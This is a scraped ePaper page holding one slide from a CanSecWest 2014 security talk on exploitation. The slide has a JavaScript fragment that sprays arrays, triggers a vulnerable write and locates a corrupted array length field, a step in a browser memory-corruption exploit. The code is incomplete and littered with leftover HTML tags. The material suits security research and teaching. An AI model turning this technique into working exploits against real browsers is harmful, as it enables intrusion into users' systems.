04.11.2014 Views

ROPs_are_for_the_99_CanSecWest_2014

ROPs_are_for_the_99_CanSecWest_2014

ROPs_are_for_the_99_CanSecWest_2014

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

Locate <strong>the</strong> address of Array data length<br />

var sprayedAddr = 0x14141414;<br />

var arrLenAddr = -1;<br />

var intArr = arrSpray( 0x11111111, count, size );<br />

writeByVul(sprayedAddr);<br />

<strong>for</strong> (i = 0 ; i < count ; i++)<br />

{<br />

<strong>for</strong> (j = 0 ; j < size ; j++)<br />

{<br />

if(intArr[i][j] != 0x11111111 )<br />

{<br />

arrLenAddr = sprayedAddr-j*4-8;<br />

break;<br />

}<br />

}<br />

if(arrLenAddr != -1) break;<br />

}

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!